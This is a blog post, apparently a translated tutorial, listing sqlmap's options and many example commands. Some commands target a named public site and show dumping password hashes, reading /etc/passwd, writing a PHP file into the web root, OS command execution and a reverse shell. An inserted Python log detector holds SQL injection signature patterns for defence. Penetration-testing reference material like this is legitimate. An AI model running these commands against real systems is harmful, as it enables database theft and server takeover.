sqlmap option tabs and common commands

sqlmap usage: python sqlmap.py [options]

sqlmap groups its options into the following sixteen tabs:

1. Help;
2. Target;
3. Request;
4. Optimization;
5. Injection;
6. Detection;
7. Techniques;
8. Fingerprint;
9. Enumeration;
10. Brute force;
11. User-defined function injection;
12. File system access;
13. Operating system access;
14. Windows registry access;
15. General;
16. Miscellaneous.

1. Help tab

  • -h, --help show the basic help message and exit;
  • -hh show the advanced help message and exit;
  • --version show the program version number and exit;
  • -v VERBOSE verbosity level: 0-6 (default 1).

2. Target tab: at least one of these options has to be provided to define the target(s).

  • -d DIRECT connection string for a direct database connection;
  • -u URL, --url=URL target URL;
  • -l LOGFILE parse targets from a Burp or WebScarab proxy log file;
  • -m BULKFILE scan multiple targets given in a text file;
  • -r REQUESTFILE load an HTTP request from a file;
  • -g GOOGLEDORK process Google dork results as target URLs;
  • -c CONFIGFILE load options from a configuration INI file.

3. Request tab: these options specify how to connect to the target URL.

  • --data=DATA data string to be sent through POST;
  • --param-del=PDEL character used to split parameter values (needed when GET or POST parameters are separated by a character other than the default);
  • --cookie=COOKIE HTTP Cookie header;
  • --cookie-del=CDEL character used to split cookie values;
  • --load-cookies=L.. file containing cookies in Netscape/wget format;
  • --drop-set-cookie ignore the Set-Cookie header from the response;
  • --user-agent=AGENT HTTP User-Agent header;
  • --random-agent use a randomly selected HTTP User-Agent header;
  • --host=HOST HTTP Host header;
  • --referer=REFERER HTTP Referer header;
  • --headers=HEADERS extra headers (e.g. "Accept-Language: fr\nETag: 123");
  • --auth-type=AUTH.. HTTP authentication type (Basic, Digest, NTLM or PKI);
  • --auth-cred=AUTH.. HTTP authentication credentials (name:password);
  • --auth-private=A.. HTTP authentication PEM private key file;
  • --proxy=PROXY use a proxy to connect to the target URL;
  • --proxy-cred=PRO.. proxy authentication credentials (name:password);
  • --proxy-file=PRO.. load a proxy list from a file;
  • --ignore-proxy ignore the system default proxy settings;
  • --tor use the Tor anonymity network;
  • --tor-port=TORPORT set a Tor proxy port other than the default;
  • --tor-type=TORTYPE set the Tor proxy type (HTTP (default), SOCKS4 or SOCKS5);
  • --check-tor check whether Tor is used properly;
  • --delay=DELAY delay in seconds between each HTTP request;
  • --timeout=TIMEOUT seconds to wait before the connection times out (default 30);
  • --retries=RETRIES retries when the connection times out (default 3);
  • --randomize=RPARAM randomly change the value of the given parameter(s);
  • --safe-url=SAFURL URL address to visit frequently during testing;
  • --safe-freq=SAFREQ number of test requests between two visits to the safe URL;
  • --skip-urlencode skip URL encoding of payload data;
  • --force-ssl force the use of SSL/HTTPS;
  • --hpp use the HTTP parameter pollution method;
  • --eval=EVALCODE evaluate the given Python code before each request, modifying the request accordingly.

4. Optimization tab: these options optimize sqlmap's performance.

  • -o turn on all optimization switches;
  • --predict-output predict common query output;
  • --keep-alive use persistent HTTP(S) connections;
  • --null-connection retrieve the page length without the actual HTTP response body;
  • --threads=THREADS maximum number of concurrent HTTP(S) requests (default 1).

5. Injection tab: these options specify which parameters to test, provide custom injection payloads and optional tamper scripts.

  • -p TESTPARAMETER testable parameter(s);
  • --skip=SKIP skip testing the given parameter(s);
  • --dbms=DBMS force the back-end DBMS to the given value;
  • --dbms-cred=DBMS.. DBMS authentication credentials (user:password);
  • --os=OS force the back-end DBMS operating system to the given value;
  • --invalid-bignum use big numbers for invalidating values;
  • --invalid-logical use logical operations for invalidating values;
  • --no-cast turn off the payload casting mechanism;
  • --no-escape turn off the string escaping mechanism;
  • --prefix=PREFIX injection payload prefix string;
  • --suffix=SUFFIX injection payload suffix string;
  • --tamper=TAMPER use the given script(s) to tamper the injection data.

6. Detection tab: these options customize the detection phase.

  • --level=LEVEL level of tests to perform (1-5, default 1);
  • --risk=RISK risk of tests to perform (0-3, default 1);
  • --string=STRING string to match when the query is evaluated to True;
  • --not-string=NOT.. string to match when the query is evaluated to False;
  • --regexp=REGEXP regular expression to match when the query is evaluated to True;
  • --code=CODE HTTP code to match when the query is evaluated to True;
  • --text-only compare pages based only on their textual content;
  • --titles compare pages based only on their titles.

7. Techniques tab: these options tune the testing of specific SQL injection techniques.

  • --technique=TECH SQL injection techniques to use (default "BEUSTQ");
  • --time-sec=TIMESEC seconds to delay the DBMS response (default 5);
  • --union-cols=UCOLS range of columns to test for UNION query SQL injection;
  • --union-char=UCHAR character to use for brute-forcing the number of columns;
  • --union-from=UFROM table to use in the FROM part of the UNION query;
  • --dns-domain=DNS.. domain name used for the DNS exfiltration attack;
  • --second-order=S.. URL of the page that shows the injection result: sometimes the result of the injected input is not returned on the current page but on another page, so this option tells sqlmap which page's response to use for the true/false judgment.
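A defender-side counterpart to the technique list above, added here as an example and not part of the original post: a small Python detector that scans constructed web-server log lines for the stock sqlmap User-Agent (which --random-agent hides) and for payload signatures keyed to the BEUSTQ technique letters. The log format, the signatures and the sample IPs are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)

# Signatures keyed by the technique letters of sqlmap's --technique (BEUSTQ).
# Coarse by design: they flag probes for review, they do not prove a successful injection.
TECHNIQUES = {
    "B": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+"),                               # boolean-based blind
    "E": re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(|FLOOR\s*\(\s*RAND\s*\("),  # error-based
    "U": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b"),                              # UNION query
    "S": re.compile(r";\s*(SELECT|INSERT|UPDATE|DELETE|DROP|EXEC|WAITFOR)\b"),    # stacked queries
    "T": re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b"),   # time-based blind
    "Q": re.compile(r"\(\s*SELECT\b"),                                            # inline query
}

# Constructed sample log lines (not real traffic). 10.0.0.9 keeps the stock sqlmap
# User-Agent; 10.0.0.12 behaves like --random-agent, so only its payloads give it away.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /news?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /news?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL-- HTTP/1.1" 200 640 "-" "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
10.0.0.12 - - [01/Jan/2024:10:00:04 +0000] "GET /news?id=1%27%3BWAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 500 0 "-" "Mozilla/5.0"
10.0.0.12 - - [01/Jan/2024:10:00:09 +0000] "GET /news?id=1/**/AND/**/1=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

def classify_request(target: str) -> set:
    """Return the set of technique letters whose signature appears in the request target."""
    decoded = unquote_plus(target).upper()
    # Tamper scripts swap spaces for inline comments; normalise them back so signatures match.
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return {letter for letter, pattern in TECHNIQUES.items() if pattern.search(decoded)}

def analyze(log_text: str) -> dict:
    """Aggregate per source IP: request count, stock sqlmap UA seen, techniques observed."""
    report = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Combined Log Format
        entry = report.setdefault(m["ip"], {"requests": 0, "sqlmap_ua": False, "techniques": set()})
        entry["requests"] += 1
        if m["ua"].lower().startswith("sqlmap/"):
            entry["sqlmap_ua"] = True
        entry["techniques"] |= classify_request(m["target"])
    return report

def suspicious_sources(report: dict) -> list:
    """IPs worth reviewing: stock sqlmap UA, or any injection technique signature."""
    return sorted(ip for ip, e in report.items() if e["sqlmap_ua"] or e["techniques"])

if __name__ == "__main__":
    print(suspicious_sources(analyze(SAMPLE_LOG)))
```

The per-IP request count is there so a rate threshold can be layered on top, since --threads and --delay change how bursty the probing looks.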

8. Fingerprint tab

  • -f, --fingerprint perform an extensive DBMS version fingerprint.

9. Enumeration tab: these options enumerate the DBMS information, the structure and the data contained in the tables; you can also run your own SQL statements.

  • -a, --all retrieve everything;
  • -b, --banner retrieve the DBMS banner;
  • --current-user retrieve the DBMS current user;
  • --current-db retrieve the DBMS current database;
  • --hostname retrieve the DBMS server hostname;
  • --is-dba detect whether the DBMS current user is a DBA;
  • --users enumerate DBMS users;
  • --passwords enumerate DBMS user password hashes;
  • --privileges enumerate DBMS user privileges;
  • --roles enumerate DBMS user roles;
  • --dbs enumerate DBMS databases;
  • --tables enumerate DBMS database tables;
  • --columns enumerate DBMS database table columns;
  • --schema enumerate the DBMS schema;
  • --count retrieve the number of entries for the table(s);
  • --dump dump DBMS database table entries;
  • --dump-all dump all DBMS database table entries;
  • --search search columns, tables and/or database names;
  • --comments retrieve DBMS comments;
  • -D DB DBMS database to enumerate;
  • -T TBL DBMS database table(s) to enumerate;
  • -C COL DBMS database table column(s) to enumerate;
  • -U USER DBMS user to enumerate;
  • --exclude-sysdbs exclude DBMS system databases when enumerating tables;
  • --start=LIMITSTART first query output entry to retrieve;
  • --stop=LIMITSTOP last query output entry to retrieve;
  • --first=FIRSTCHAR first query output word character to retrieve;
  • --last=LASTCHAR last query output word character to retrieve;
  • --sql-query=QUERY SQL statement to be executed;
  • --sql-shell prompt for an interactive SQL shell;
  • --sql-file=SQLFILE execute SQL statements from the given file.

10. Brute force tab: these options run brute-force checks.

  • --common-tables check the existence of common tables;
  • --common-columns check the existence of common columns.

11. User-defined function injection tab: these options create custom user-defined functions.

  • --udf-inject inject custom user-defined functions;
  • --shared-lib=SHLIB local path of the shared library.

12. File system access tab: these options access the underlying file system of the back-end DBMS.

  • --file-read=RFILE read a file from the back-end DBMS file system;
  • --file-write=WFILE write a local file onto the back-end DBMS file system;
  • --file-dest=DFILE absolute path on the back-end DBMS where the file is written.

13. Operating system access tab: these options access the underlying operating system of the back-end DBMS.

  • --os-cmd=OSCMD execute an operating system command;
  • --os-shell prompt for an interactive operating system shell;
  • --os-pwn prompt for an OOB shell, Meterpreter or VNC;
  • --os-smbrelay one-click prompt for an OOB shell, Meterpreter or VNC;
  • --os-bof stored procedure buffer overflow exploitation;
  • --priv-esc database process user privilege escalation;
  • --msf-path=MSFPATH local path where the Metasploit Framework is installed;
  • --tmp-path=TMPPATH remote absolute path of the temporary files directory.

14. Windows registry access tab: these options access the Windows registry of the back-end DBMS.

  • --reg-read read a Windows registry key value;
  • --reg-add write a Windows registry key value data;
  • --reg-del delete a Windows registry key value;
  • --reg-key=REGKEY Windows registry key;
  • --reg-value=REGVAL Windows registry key value;
  • --reg-data=REGDATA Windows registry key value data;
  • --reg-type=REGTYPE Windows registry key value type.

15. General tab: these options set some general working parameters.

  • -s SESSIONFILE load the session from a stored file;
  • -t TRAFFICFILE log all HTTP traffic into a text file;
  • --batch never ask for user input, use the default behaviour;
  • --charset=CHARSET force the character encoding used for data retrieval;
  • --crawl=CRAWLDEPTH crawl the website starting from the target URL;
  • --csv-del=CSVDEL delimiting character used in CSV output (default ",");
  • --dump-format=DU.. format of dumped data (CSV (default), HTML or SQLITE);
  • --eta display for each output the estimated time of arrival;
  • --flush-session flush the session file for the current target;
  • --forms parse and test forms on the target URL;
  • --fresh-queries ignore the query results stored in the session file;
  • --hex use DBMS hex function(s) for data retrieval;
  • --output-dir=ODIR custom output directory path;
  • --parse-errors parse and display DBMS error messages from responses;
  • --pivot-column=P.. pivot column name;
  • --save save the options to a configuration INI file;
  • --scope=SCOPE regular expression to filter targets from the provided proxy log;
  • --test-filter=TE.. select tests by payloads and/or titles;
  • --update update sqlmap.

16. Miscellaneous tab

  • -z MNEMONICS use short mnemonics;
  • --alert=ALERT run host OS command(s) when a SQL injection is found;
  • --answers=ANSWERS set predefined answers to questions;
  • --beep beep when a SQL injection is found;
  • --check-waf heuristically check for WAF/IPS/IDS protection;
  • --cleanup clean up the DBMS from sqlmap-specific UDFs and tables;
  • --dependencies check for missing sqlmap dependencies;
  • --disable-coloring disable console output coloring;
  • --gpage=GOOGLEPAGE use Google dork results from the specified page number;
  • --identify-waf make a thorough test for WAF/IPS/IDS protection;
  • --mobile imitate a smartphone through the HTTP User-Agent header;
  • --page-rank display the page rank (PR) of Google dork results;
  • --purge-output safely remove all content from the output directory;
  • --smart conduct thorough tests only if positive heuristics;
  • --wizard simple wizard interface for beginner users.

Common commands:

1. Submit with the POST method

sqlmap.py -u "http://192.168.1.1/sqlmap/oracle/post_int.php" --method POST --data "id=1"

2. Submit with cookies; multiple cookie values are separated by ";", and the cookies can be captured with TamperData

python sqlmap.py -u "http://192.168.1.1/sqlmap/mssql/cookie_int.php" --cookie "id=1" -v 1

3. Use Referer spoofing

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" --referer "http://www.google.com" -v 3

4. Use a custom User-Agent, or a random one from sqlmap's own user-agents.txt

python sqlmap.py -u "http://192.168.1.1/sqlmap/oracle/get_int.php?id=1" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3

python sqlmap.py -u "URL" -v 1 -a "./txt/user-agents.txt"

5. Use basic authentication

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/basic/get_int.php?id=1" --auth-type Basic --auth-cred "testuser:testpass" -v 3

6. Use digest authentication

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/digest/get_int.php?id=1" --auth-type Digest --auth-cred "testuser:testpass" -v 3

7. Use a proxy, or Tor

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:3128"

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" --proxy "http://192.168.1.47:8118"

8. Use multi-threaded guessing

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int.php?id=1" -v 1 --current-user --threads 3

9. Bypass the dynamic detection by specifying the injection parameter(s) directly; multiple parameters are separated by commas; the User-Agent can also be specified as the injection point

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" -v 1 -p "id"

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 -p "cat,id"

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/ua_str.php" -v 1 -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"

10. Specify the database, bypassing sqlmap's automatic detection

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" -v 2 --dbms "PostgreSQL"

Possible values:

* MySQL
* Oracle
* PostgreSQL
* Microsoft SQL Server

11. Specify the operating system, bypassing sqlmap's automatic detection

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_int.php?id=1" -v 2 --os "Windows"

Possible values:

* Linux
* Windows

12. Custom payload

Options: --prefix and --postfix

13. Page comparison

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v

14. Exclude dynamic page content from the comparison

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

15. Multi-statement (stacked queries) test; note that PHP's mysql_query() does not support multiple statements

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

16. UNION injection test

python sqlmap.py -u "http://192.168.1.1/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

17. UNION injection using ORDER BY

python sqlmap.py -u "http://192.168.1.1/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1

python sqlmap.py -u "http://192.168.1.1/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user

python sqlmap.py -u "http://192.168.1.1/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

Fingerprint

python sqlmap.py -u "http://192.168.1.1/sqlmap/mssql/get_int.php?id=1" -v 1 -f

python sqlmap.py -u "http://192.168.123.36/sqlmap/get_str.asp?name=luther" -v 1 -f -b

# This simple injection process is taken in part from: Network Security Attack and Defense Laboratory (www.91ri.org)

1. Read the database version, the current user and the current database

sqlmap -u http://www.91ri.org/test.php?p=2 -f -b --current-user --current-db -v 1

2. Determine the privileges of the current database user

sqlmap -u http://www.91ri.org/test.php?p=2 --privileges -U username -v 1

sqlmap -u http://www.91ri.org/test.php?p=2 --is-dba -U username -v 1

3. Read the password hashes of all database users, or of a specified database user

sqlmap -u http://www.91ri.org/test.php?p=2 --users --passwords -v 2

sqlmap -u http://www.91ri.org/test.php?p=2 --passwords -U root -v 2

4. Get all the databases

sqlmap -u http://www.91ri.org/test.php?p=2 --dbs -v 2

5. Get all the tables in the specified database

sqlmap -u http://www.91ri.org/test.php?p=2 --tables -D mysql -v 2

6. Get the column names of the specified table in the specified database

sqlmap -u http://www.91ri.org/test.php?p=2 --columns -D mysql -T users -v 2

7. Get the data of the specified columns of the specified table in the specified database

sqlmap -u http://www.91ri.org/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2

8. Read web files with --file-read

sqlmap -u http://www.91ri.org/test.php?p=2 --file-read "/etc/passwd" -v 2

9. Write files to the web server with --file-write

sqlmap -u http://www.91ri.org/test.php?p=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2

sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # --dbms specifies the database type

sqlmap -u "http://url/news?id=1" --users # list database users

sqlmap -u "http://url/news?id=1" --dbs # list databases

sqlmap -u "http://url/news?id=1" --passwords # database user password hashes

sqlmap -u "http://url/news?id=1" --passwords -U root -v 0 # list the password hash of the specified database user

sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 # dump the specified columns of the table, entries 1 to 20

sqlmap -u "http://url/news?id=1" --dump-all -v 0 # dump all tables in all databases

sqlmap -u "http://url/news?id=1" --privileges # view privileges

sqlmap -u "http://url/news?id=1" --privileges -U root # view the privileges of the specified user

sqlmap -u "http://url/news?id=1" --is-dba -v 1 # check whether the current user is a database administrator

sqlmap -u "http://url/news?id=1" --roles # enumerate database user roles

sqlmap -u "http://url/news?id=1" --udf-inject # inject user-defined functions (to obtain system privileges)

sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 # dump all tables, excluding system databases

sqlmap -u "http://url/news?id=1" --union-cols # UNION query column range to test

sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" # cookie injection

sqlmap -u "http://url/news?id=1" -b # retrieve banner information

sqlmap -u "http://url/news?id=1" --data "id=3" # POST injection

sqlmap -u "http://url/news?id=1" -v 1 -f # fingerprint the database type

sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118" # injection through a proxy

sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE" # specify the keyword present on the True page

sqlmap -u "http://url/news?id=1" --sql-shell # execute SQL statements interactively

sqlmap -u "http://url/news?id=1" --file /etc/passwd

sqlmap -u "http://url/news?id=1" --os-cmd=whoami # execute a system command

sqlmap -u "http://url/news?id=1" --os-shell # interactive system shell

sqlmap -u "http://url/news?id=1" --os-pwn # reverse shell

sqlmap -u "http://url/news?id=1" --reg-read # read the Windows registry

sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" # save progress

sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume # resume saved progress


Origin www.cnblogs.com/luozhiyuan/p/11244645.html